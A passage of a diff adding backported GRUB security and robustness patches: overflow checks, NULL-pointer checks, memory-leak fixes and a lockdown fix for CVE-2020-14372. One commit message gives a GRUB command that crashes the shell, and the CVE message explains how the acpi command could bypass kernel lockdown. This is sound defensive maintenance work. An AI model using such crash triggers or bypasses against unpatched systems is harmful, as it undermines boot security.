70- grub_size_t page_size = mode_info.pitch * mode_info.height;
71+ grub_size_t page_size = (grub_size_t) mode_info.pitch * mode_info.height;
72
73 framebuffer.offscreen_buffer = grub_zalloc (page_size);
74 if (! framebuffer.offscreen_buffer)
75@@ -1482,12 +1491,23 @@ doublebuf_pageflipping_update_screen (void)
76 last_line = framebuffer.previous_dirty.last_line;
77
78 if (first_line <= last_line)
79- grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page]
80- + first_line * framebuffer.back_target->mode_info.pitch,
81- (char *) framebuffer.back_target->data
82- + first_line * framebuffer.back_target->mode_info.pitch,
83- framebuffer.back_target->mode_info.pitch
84- * (last_line - first_line));
85+ {
86+ grub_size_t copy_size;
87+
88+ if (grub_sub (last_line, first_line, &copy_size) ||
89+ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
90+ {
91+ /* Shouldn't happen, but if it does we've a bug. */
92+ return GRUB_ERR_BUG;
93+ }
94+
95+ grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page] + first_line *
96+ framebuffer.back_target->mode_info.pitch,
97+ (char *) framebuffer.back_target->data + first_line *
98+ framebuffer.back_target->mode_info.pitch,
99+ copy_size);
100+ }
101+
102 framebuffer.previous_dirty = framebuffer.current_dirty;
103 framebuffer.current_dirty.first_line
104 = framebuffer.back_target->mode_info.height;
diff --git a/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
new file mode 100644
index 0000000000..c82b2c7df0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
@@ -0,0 +1,39 @@
1From aac5574ff340a665ccc78d4c3d61596ac67acbbe Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 4 Dec 2020 14:51:30 +0000
4Subject: [PATCH] video/fb/video_fb: Fix possible integer overflow
5
6It is minimal possibility that the values being used here will overflow.
7So, change the code to use the safemath function grub_mul() to ensure
8that doesn't happen.
9
10Fixes: CID 73761
11
12Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08413f2f4edec0e2d9bf15f836f6ee5ca2e379cb]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 grub-core/video/fb/video_fb.c | 8 +++++++-
19 1 file changed, 7 insertions(+), 1 deletion(-)
20
21diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
22index 1c9a138..ae6b89f 100644
23--- a/grub-core/video/fb/video_fb.c
24+++ b/grub-core/video/fb/video_fb.c
25@@ -1537,7 +1537,13 @@ doublebuf_pageflipping_init (struct grub_video_mode_info *mode_info,
26 volatile void *page1_ptr)
27 {
28 grub_err_t err;
29- grub_size_t page_size = mode_info->pitch * mode_info->height;
30+ grub_size_t page_size = 0;
31+
32+ if (grub_mul (mode_info->pitch, mode_info->height, &page_size))
33+ {
34+ /* Shouldn't happen, but if it does we've a bug. */
35+ return GRUB_ERR_BUG;
36+ }
37
38 framebuffer.offscreen_buffer = grub_malloc (page_size);
39 if (! framebuffer.offscreen_buffer)
diff --git a/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
new file mode 100644
index 0000000000..3fca2aecb5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
@@ -0,0 +1,38 @@
1From 88361a7fd4e481a76e1159a63c9014fa997ef29c Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 4 Dec 2020 15:39:00 +0000
4Subject: [PATCH] video/readers/jpeg: Test for an invalid next marker reference
5 from a jpeg file
6
7While it may never happen, and potentially could be caught at the end of
8the function, it is worth checking up front for a bad reference to the
9next marker just in case of a maliciously crafted file being provided.
10
11Fixes: CID 73694
12
13Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
14Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
15
16Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5f5eb7ca8e971227e95745abe541df3e1509360e]
17Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
18---
19 grub-core/video/readers/jpeg.c | 6 ++++++
20 1 file changed, 6 insertions(+)
21
22diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
23index 31359a4..0b6ce3c 100644
24--- a/grub-core/video/readers/jpeg.c
25+++ b/grub-core/video/readers/jpeg.c
26@@ -253,6 +253,12 @@ grub_jpeg_decode_quan_table (struct grub_jpeg_data *data)
27 next_marker = data->file->offset;
28 next_marker += grub_jpeg_get_word (data);
29
30+ if (next_marker > data->file->size)
31+ {
32+ /* Should never be set beyond the size of the file. */
33+ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "jpeg: invalid next reference");
34+ }
35+
36 while (data->file->offset + sizeof (data->quan_table[id]) + 1
37 <= next_marker)
38 {
diff --git a/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
new file mode 100644
index 0000000000..61e5e5797d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
@@ -0,0 +1,34 @@
1From 9433cb3a37c03f22c2fa769121f1f509fd031ae9 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Mon, 7 Dec 2020 14:44:47 +0000
4Subject: [PATCH] gfxmenu/gui_list: Remove code that coverity is flagging as
5 dead
6
7The test of value for NULL before calling grub_strdup() is not required,
8since the if condition prior to this has already tested for value being
9NULL and cannot reach this code if it is.
10
11Fixes: CID 73659
12
13Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
14Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
15
16Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4a1aa5917595650efbd46b581368c470ebee42ab]
17Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
18---
19 grub-core/gfxmenu/gui_list.c | 2 +-
20 1 file changed, 1 insertion(+), 1 deletion(-)
21
22diff --git a/grub-core/gfxmenu/gui_list.c b/grub-core/gfxmenu/gui_list.c
23index 01477cd..df334a6 100644
24--- a/grub-core/gfxmenu/gui_list.c
25+++ b/grub-core/gfxmenu/gui_list.c
26@@ -771,7 +771,7 @@ list_set_property (void *vself, const char *name, const char *value)
27 {
28 self->need_to_recreate_boxes = 1;
29 grub_free (self->selected_item_box_pattern);
30- self->selected_item_box_pattern = value ? grub_strdup (value) : 0;
31+ self->selected_item_box_pattern = grub_strdup (value);
32 self->selected_item_box_pattern_inherit = 0;
33 }
34 }
diff --git a/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
new file mode 100644
index 0000000000..34643e10ab
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
@@ -0,0 +1,47 @@
1From 7899384c8fdf9ed96566978c49b0c6e40e70703d Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Tue, 8 Dec 2020 21:47:13 +0000
4Subject: [PATCH] loader/bsd: Check for NULL arg up-front
5
6The code in the next block suggests that it is possible for .set to be
7true but .arg may still be NULL.
8
9This code assumes that it is never NULL, yet later is testing if it is
10NULL - that is inconsistent.
11
12So we should check first if .arg is not NULL, and remove this check that
13is being flagged by Coverity since it is no longer required.
14
15Fixes: CID 292471
16
17Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
18Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
19
20Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5d5391b0a05abe76e04c1eb68dcc6cbef5326c4a]
21Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
22---
23 grub-core/loader/i386/bsd.c | 4 ++--
24 1 file changed, 2 insertions(+), 2 deletions(-)
25
26diff --git a/grub-core/loader/i386/bsd.c b/grub-core/loader/i386/bsd.c
27index b92cbe9..8432283 100644
28--- a/grub-core/loader/i386/bsd.c
29+++ b/grub-core/loader/i386/bsd.c
30@@ -1605,7 +1605,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
31 kernel_type = KERNEL_TYPE_OPENBSD;
32 bootflags = grub_bsd_parse_flags (ctxt->state, openbsd_flags);
33
34- if (ctxt->state[OPENBSD_ROOT_ARG].set)
35+ if (ctxt->state[OPENBSD_ROOT_ARG].set && ctxt->state[OPENBSD_ROOT_ARG].arg != NULL)
36 {
37 const char *arg = ctxt->state[OPENBSD_ROOT_ARG].arg;
38 unsigned type, unit, part;
39@@ -1622,7 +1622,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
40 "unknown disk type name");
41
42 unit = grub_strtoul (arg, (char **) &arg, 10);
43- if (! (arg && *arg >= 'a' && *arg <= 'z'))
44+ if (! (*arg >= 'a' && *arg <= 'z'))
45 return grub_error (GRUB_ERR_BAD_ARGUMENT,
46 "only device specifications of form "
47 "<type><number><lowercase letter> are supported");
diff --git a/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
new file mode 100644
index 0000000000..41f09a22fc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
@@ -0,0 +1,38 @@
1From 0a4aa7c16f65cdfaa1013f0796afa929f8d6dc1a Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 26 Nov 2020 12:53:10 +0000
4Subject: [PATCH] loader/xnu: Fix memory leak
5
6The code here is finished with the memory stored in name, but it only
7frees it if there curvalue is valid, while it could actually free it
8regardless.
9
10The fix is a simple relocation of the grub_free() to before the test
11of curvalue.
12
13Fixes: CID 96646
14
15Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
16Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
17
18Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bcb59ece3263d118510c4440c4da0950f224bb7f]
19Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
20---
21 grub-core/loader/xnu.c | 2 +-
22 1 file changed, 1 insertion(+), 1 deletion(-)
23
24diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
25index 07232d2..b3029a8 100644
26--- a/grub-core/loader/xnu.c
27+++ b/grub-core/loader/xnu.c
28@@ -1388,9 +1388,9 @@ grub_xnu_fill_devicetree (void)
29 name[len] = 0;
30
31 curvalue = grub_xnu_create_value (curkey, name);
32+ grub_free (name);
33 if (!curvalue)
34 return grub_errno;
35- grub_free (name);
36
37 data = grub_malloc (grub_strlen (var->value) + 1);
38 if (!data)
diff --git a/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
new file mode 100644
index 0000000000..f9ad0fc34c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
@@ -0,0 +1,77 @@
1From 81117a77a9e945ee5e7c1f12bd5667e2a16cbe32 Mon Sep 17 00:00:00 2001
2From: Marco A Benatto <mbenatto@redhat.com>
3Date: Mon, 30 Nov 2020 12:18:24 -0300
4Subject: [PATCH] loader/xnu: Free driverkey data when an error is detected in
5 grub_xnu_writetree_toheap()
6
7... to avoid memory leaks.
8
9Fixes: CID 96640
10
11Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4b4027b6b1c877d7ab467896b04c7bd1aadcfa15]
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/loader/xnu.c | 24 ++++++++++++++++++++----
18 1 file changed, 20 insertions(+), 4 deletions(-)
19
20diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
21index b3029a8..39ceff8 100644
22--- a/grub-core/loader/xnu.c
23+++ b/grub-core/loader/xnu.c
24@@ -224,26 +224,33 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
25 if (! memorymap)
26 return grub_errno;
27
28- driverkey = (struct grub_xnu_devtree_key *) grub_malloc (sizeof (*driverkey));
29+ driverkey = (struct grub_xnu_devtree_key *) grub_zalloc (sizeof (*driverkey));
30 if (! driverkey)
31 return grub_errno;
32 driverkey->name = grub_strdup ("DeviceTree");
33 if (! driverkey->name)
34- return grub_errno;
35+ {
36+ err = grub_errno;
37+ goto fail;
38+ }
39+
40 driverkey->datasize = sizeof (*extdesc);
41 driverkey->next = memorymap->first_child;
42 memorymap->first_child = driverkey;
43 driverkey->data = extdesc
44 = (struct grub_xnu_extdesc *) grub_malloc (sizeof (*extdesc));
45 if (! driverkey->data)
46- return grub_errno;
47+ {
48+ err = grub_errno;
49+ goto fail;
50+ }
51
52 /* Allocate the space based on the size with dummy value. */
53 *size = grub_xnu_writetree_get_size (grub_xnu_devtree_root, "/");
54 err = grub_xnu_heap_malloc (ALIGN_UP (*size + 1, GRUB_XNU_PAGESIZE),
55 &src, target);
56 if (err)
57- return err;
58+ goto fail;
59
60 /* Put real data in the dummy. */
61 extdesc->addr = *target;
62@@ -252,6 +259,15 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
63 /* Write the tree to heap. */
64 grub_xnu_writetree_toheap_real (src, grub_xnu_devtree_root, "/");
65 return GRUB_ERR_NONE;
66+
67+ fail:
68+ memorymap->first_child = NULL;
69+
70+ grub_free (driverkey->data);
71+ grub_free (driverkey->name);
72+ grub_free (driverkey);
73+
74+ return err;
75 }
76
77 /* Find a key or value in parent key. */
diff --git a/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
new file mode 100644
index 0000000000..8081f7763a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
@@ -0,0 +1,42 @@
1From 778a3fffd19229e5650a1abfb06c974949991cd4 Mon Sep 17 00:00:00 2001
2From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
3Date: Mon, 30 Nov 2020 10:36:00 -0300
4Subject: [PATCH] loader/xnu: Check if pointer is NULL before using it
5
6Fixes: CID 73654
7
8Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
9Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
10
11Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7c8a2b5d1421a0f2a33d33531f7561f3da93b844]
12Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
13---
14 grub-core/loader/xnu.c | 8 ++++----
15 1 file changed, 4 insertions(+), 4 deletions(-)
16
17diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
18index 39ceff8..adc048c 100644
19--- a/grub-core/loader/xnu.c
20+++ b/grub-core/loader/xnu.c
21@@ -667,6 +667,9 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
22 char *name, *nameend;
23 int namelen;
24
25+ if (infoplistname == NULL)
26+ return grub_error (GRUB_ERR_BAD_FILENAME, N_("missing p-list filename"));
27+
28 name = get_name_ptr (infoplistname);
29 nameend = grub_strchr (name, '/');
30
31@@ -698,10 +701,7 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
32 else
33 macho = 0;
34
35- if (infoplistname)
36- infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
37- else
38- infoplist = 0;
39+ infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
40 grub_errno = GRUB_ERR_NONE;
41 if (infoplist)
42 {
diff --git a/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
new file mode 100644
index 0000000000..ea563a41a0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
@@ -0,0 +1,41 @@
1From 5d2dd0052474a882a22e47cc8c3ed87a01819f6b Mon Sep 17 00:00:00 2001
2From: Daniel Kiper <daniel.kiper@oracle.com>
3Date: Thu, 25 Feb 2021 18:35:01 +0100
4Subject: [PATCH] util/grub-install: Fix NULL pointer dereferences
5
6Two grub_device_open() calls does not have associated NULL checks
7for returned values. Fix that and appease the Coverity.
8
9Fixes: CID 314583
10
11Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
12Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b3a95655b4391122e7b0315d8cc6f876caf8183]
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 util/grub-install.c | 4 ++++
18 1 file changed, 4 insertions(+)
19
20diff --git a/util/grub-install.c b/util/grub-install.c
21index a82725f..367350f 100644
22--- a/util/grub-install.c
23+++ b/util/grub-install.c
24@@ -1775,6 +1775,8 @@ main (int argc, char *argv[])
25 fill_core_services (core_services);
26
27 ins_dev = grub_device_open (install_drive);
28+ if (ins_dev == NULL)
29+ grub_util_error ("%s", grub_errmsg);
30
31 bless (ins_dev, core_services, 0);
32
33@@ -1875,6 +1877,8 @@ main (int argc, char *argv[])
34 fill_core_services(core_services);
35
36 ins_dev = grub_device_open (install_drive);
37+ if (ins_dev == NULL)
38+ grub_util_error ("%s", grub_errmsg);
39
40 bless (ins_dev, boot_efi, 1);
41 if (!removable && update_nvram)
diff --git a/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
new file mode 100644
index 0000000000..0cd8ec3611
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
@@ -0,0 +1,46 @@
1From 3d68daf2567aace4b52bd238cfd4a8111af3bc04 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 5 Nov 2020 14:33:50 +0000
4Subject: [PATCH] util/grub-editenv: Fix incorrect casting of a signed value
5
6The return value of ftell() may be negative (-1) on error. While it is
7probably unlikely to occur, we should not blindly cast to an unsigned
8value without first testing that it is not negative.
9
10Fixes: CID 73856
11
12Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5dc41edc4eba259c6043ae7698c245ec1baaacc6]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 util/grub-editenv.c | 8 +++++++-
19 1 file changed, 7 insertions(+), 1 deletion(-)
20
21diff --git a/util/grub-editenv.c b/util/grub-editenv.c
22index f3662c9..db6f187 100644
23--- a/util/grub-editenv.c
24+++ b/util/grub-editenv.c
25@@ -125,6 +125,7 @@ open_envblk_file (const char *name)
26 {
27 FILE *fp;
28 char *buf;
29+ long loc;
30 size_t size;
31 grub_envblk_t envblk;
32
33@@ -143,7 +144,12 @@ open_envblk_file (const char *name)
34 grub_util_error (_("cannot seek `%s': %s"), name,
35 strerror (errno));
36
37- size = (size_t) ftell (fp);
38+ loc = ftell (fp);
39+ if (loc < 0)
40+ grub_util_error (_("cannot get file location `%s': %s"), name,
41+ strerror (errno));
42+
43+ size = (size_t) loc;
44
45 if (fseek (fp, 0, SEEK_SET) < 0)
46 grub_util_error (_("cannot seek `%s': %s"), name,
diff --git a/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
new file mode 100644
index 0000000000..66d7c0aa42
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
@@ -0,0 +1,50 @@
1From e301a0f38a2130eb80f346c31e43bf5089af583c Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 4 Dec 2020 15:04:28 +0000
4Subject: [PATCH] util/glue-efi: Fix incorrect use of a possibly negative value
5
6It is possible for the ftell() function to return a negative value,
7although it is fairly unlikely here, we should be checking for
8a negative value before we assign it to an unsigned value.
9
10Fixes: CID 73744
11
12Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=1641d74e16f9d1ca35ba1a87ee4a0bf3afa48e72]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 util/glue-efi.c | 14 ++++++++++++--
19 1 file changed, 12 insertions(+), 2 deletions(-)
20
21diff --git a/util/glue-efi.c b/util/glue-efi.c
22index 68f5316..de0fa6d 100644
23--- a/util/glue-efi.c
24+++ b/util/glue-efi.c
25@@ -39,13 +39,23 @@ write_fat (FILE *in32, FILE *in64, FILE *out, const char *out_filename,
26 struct grub_macho_fat_header head;
27 struct grub_macho_fat_arch arch32, arch64;
28 grub_uint32_t size32, size64;
29+ long size;
30 char *buf;
31
32 fseek (in32, 0, SEEK_END);
33- size32 = ftell (in32);
34+ size = ftell (in32);
35+ if (size < 0)
36+ grub_util_error ("cannot get end of input file '%s': %s",
37+ name32, strerror (errno));
38+ size32 = (grub_uint32_t) size;
39 fseek (in32, 0, SEEK_SET);
40+
41 fseek (in64, 0, SEEK_END);
42- size64 = ftell (in64);
43+ size = ftell (in64);
44+ if (size < 0)
45+ grub_util_error ("cannot get end of input file '%s': %s",
46+ name64, strerror (errno));
47+ size64 = (grub_uint64_t) size;
48 fseek (in64, 0, SEEK_SET);
49
50 head.magic = grub_cpu_to_le32_compile_time (GRUB_MACHO_FAT_EFI_MAGIC);
diff --git a/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
new file mode 100644
index 0000000000..b279222fff
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
@@ -0,0 +1,28 @@
1From f5fb56954e5926ced42a980c3e0842ffd5fea2aa Mon Sep 17 00:00:00 2001
2From: Daniel Axtens <dja@axtens.net>
3Date: Fri, 3 Apr 2020 23:05:13 +1100
4Subject: [PATCH] script/execute: Fix NULL dereference in
5 grub_script_execute_cmdline()
6
7Signed-off-by: Daniel Axtens <dja@axtens.net>
8Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
9
10Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=41ae93b2e6c75453514629bcfe684300e3aec0ce]
11Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
12---
13 grub-core/script/execute.c | 2 +-
14 1 file changed, 1 insertion(+), 1 deletion(-)
15
16diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
17index 7e028e1..5ea2aef 100644
18--- a/grub-core/script/execute.c
19+++ b/grub-core/script/execute.c
20@@ -940,7 +940,7 @@ grub_script_execute_cmdline (struct grub_script_cmd *cmd)
21 struct grub_script_argv argv = { 0, 0, 0 };
22
23 /* Lookup the command. */
24- if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args[0])
25+ if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args || ! argv.args[0])
26 return grub_errno;
27
28 for (i = 0; i < argv.argc; i++)
diff --git a/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
new file mode 100644
index 0000000000..5a327fe1d2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
@@ -0,0 +1,33 @@
1From dd82f98fa642907817f59aeaf3761b786898df85 Mon Sep 17 00:00:00 2001
2From: Daniel Axtens <dja@axtens.net>
3Date: Mon, 11 Jan 2021 16:57:37 +1100
4Subject: [PATCH] commands/ls: Require device_name is not NULL before printing
5
6This can be triggered with:
7 ls -l (0 0*)
8and causes a NULL deref in grub_normal_print_device_info().
9
10I'm not sure if there's any implication with the IEEE 1275 platform.
11
12Signed-off-by: Daniel Axtens <dja@axtens.net>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6afbe6063c95b827372f9ec310c9fc7461311eb1]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 grub-core/commands/ls.c | 2 +-
19 1 file changed, 1 insertion(+), 1 deletion(-)
20
21diff --git a/grub-core/commands/ls.c b/grub-core/commands/ls.c
22index 5b7491a..326d2d6 100644
23--- a/grub-core/commands/ls.c
24+++ b/grub-core/commands/ls.c
25@@ -196,7 +196,7 @@ grub_ls_list_files (char *dirname, int longlist, int all, int human)
26 goto fail;
27 }
28
29- if (! *path)
30+ if (! *path && device_name)
31 {
32 if (grub_errno == GRUB_ERR_UNKNOWN_FS)
33 grub_errno = GRUB_ERR_NONE;
diff --git a/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
new file mode 100644
index 0000000000..84117a9073
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
@@ -0,0 +1,37 @@
1From df2505c4c3cf42b0c419c99a5f9e1ce63e5a5938 Mon Sep 17 00:00:00 2001
2From: Daniel Axtens <dja@axtens.net>
3Date: Mon, 11 Jan 2021 17:30:42 +1100
4Subject: [PATCH] script/execute: Avoid crash when using "$#" outside a
5 function scope
6
7"$#" represents the number of arguments to a function. It is only
8defined in a function scope, where "scope" is non-NULL. Currently,
9if we attempt to evaluate "$#" outside a function scope, "scope" will
10be NULL and we will crash with a NULL pointer dereference.
11
12Do not attempt to count arguments for "$#" if "scope" is NULL. This
13will result in "$#" being interpreted as an empty string if evaluated
14outside a function scope.
15
16Signed-off-by: Daniel Axtens <dja@axtens.net>
17Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
18
19Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fe0586347ee46f927ae27bb9673532da9f5dead5]
20Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
21---
22 grub-core/script/execute.c | 2 +-
23 1 file changed, 1 insertion(+), 1 deletion(-)
24
25diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
26index 5ea2aef..23d34bd 100644
27--- a/grub-core/script/execute.c
28+++ b/grub-core/script/execute.c
29@@ -485,7 +485,7 @@ gettext_putvar (const char *str, grub_size_t len,
30 return 0;
31
32 /* Enough for any number. */
33- if (len == 1 && str[0] == '#')
34+ if (len == 1 && str[0] == '#' && scope != NULL)
35 {
36 grub_snprintf (*ptr, 30, "%u", scope->argv.argc);
37 *ptr += grub_strlen (*ptr);
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
new file mode 100644
index 0000000000..08e7666cde
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
@@ -0,0 +1,76 @@
1From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Mon, 28 Sep 2020 20:08:41 +0200
4Subject: [PATCH] acpi: Don't register the acpi command when locked down
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9The command is not allowed when lockdown is enforced. Otherwise an
10attacker can instruct the GRUB to load an SSDT table to overwrite
11the kernel lockdown configuration and later load and execute
12unsigned code.
13
14Fixes: CVE-2020-14372
15
16Reported-by: Máté Kukri <km@mkukri.xyz>
17Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
18Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
19
20Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95]
21CVE: CVE-2020-14372
22Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
23---
24 docs/grub.texi | 5 +++++
